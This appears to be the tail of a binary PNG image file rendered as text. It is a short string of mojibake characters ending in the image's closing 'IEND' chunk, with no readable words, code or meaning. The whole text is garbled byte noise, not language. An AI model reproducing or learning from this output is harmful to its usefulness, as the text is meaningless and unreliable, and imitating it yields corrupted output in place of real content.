ß yôÊáœ~ŒorÀ5ÖJ™={þÁEÇêeŸu磝Qk®•ᯘG{÷?ù»ã+—]üôçƒÉÍ×ןô?wûM3X^¶Ú歌>{Ž7ÙŸìŽKã>èo²ÎnÝ\ÿªÊj¿y·ðR £õãg/î=ÞÿfúOçÖr·o×NVÊv¿ú~ÿY+ü¿NGêu÷ø·Ã®›þë¹HWŠûyëwÆ[eQ¶ÊšŸSÚb­Ö>öÍËÇþ³>ä}Gçmx[o[<ÞÚ{ðýŸÏ®_ÅïqF– ÚÛvMIEND®B`‚